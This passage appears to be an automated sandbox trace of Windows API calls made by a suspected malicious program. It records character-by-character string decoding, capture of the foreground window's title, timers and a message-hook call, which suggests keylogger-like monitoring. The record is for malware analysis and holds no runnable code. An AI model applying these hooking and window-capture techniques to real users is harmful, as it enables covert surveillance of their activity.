lpWideCharStr="-") returned 1 [0086.971] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.971] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.971] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.972] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.972] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.972] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.973] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.973] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.973] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.974] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.974] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.975] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.975] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.975] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.976] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.976] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.976] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.977] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.977] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.978] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.978] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.978] GetForegroundWindow () returned 0x102c2 [0086.978] GetLastError () returned 0x0 [0086.979] SysStringLen (param_1=" ") returned 0xff [0086.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.979] SysStringLen (param_1=" ") returned 0xff [0086.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.979] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.979] GetLastError () returned 0x0 [0086.979] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.979] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.980] SysStringLen (param_1="Ac") returned 0x2 [0086.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0xe4a94c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0086.980] SetWindowTextA (hWnd=0x2036e, lpString="Ac") returned 1 [0086.980] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.980] GetFocus () returned 0x0 [0086.980] lstrlenA (lpString="Ac") returned 2 [0086.980] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0086.981] IsWindow (hWnd=0x2036e) returned 1 [0086.981] IsWindow (hWnd=0x2036e) returned 1 [0086.981] IsWindow (hWnd=0x2036e) returned 1 [0086.981] IsWindow (hWnd=0x2036e) returned 1 [0086.981] GetFocus () returned 0x0 [0086.982] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0086.982] GetFocus () returned 0x0 [0086.982] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0086.982] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0086.982] GetFocus () returned 0x0 [0086.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0086.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0086.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.982] VarBstrCmp (bstrLeft="Ac", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.983] SetTimer (hWnd=0x20372, nIDEvent=0x20372, uElapse=0x64, lpTimerFunc=0x0) returned 0x20372 [0088.749] CallNextHookEx (hhk=0x900d9, nCode=0, wParam=0x1, lParam=0x28f51c) returned 0x0 [0088.749] KillTimer (hWnd=0x20372, uIDEvent=0x20372) returned 1 [0088.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.750] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.751] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.751] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.751] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.752] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.752] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.752] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.752] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.753] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.753] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.754] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.754] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.754] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.754] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.755] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.755] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.756] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.757] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.757] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.758] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.758] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.758] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.759] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.759] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.760] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.760] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.761] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.761] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.762] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.762] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.763] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.763] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.764] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.764] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.765] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.765] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0088.765] GetForegroundWindow () returned 0x102c2 [0088.765] GetLastError () returned 0x0 [0088.766] SysStringLen (param_1=" ") returned 0xff [0088.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.766] SysStringLen (param_1=" ") returned 0xff [0088.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 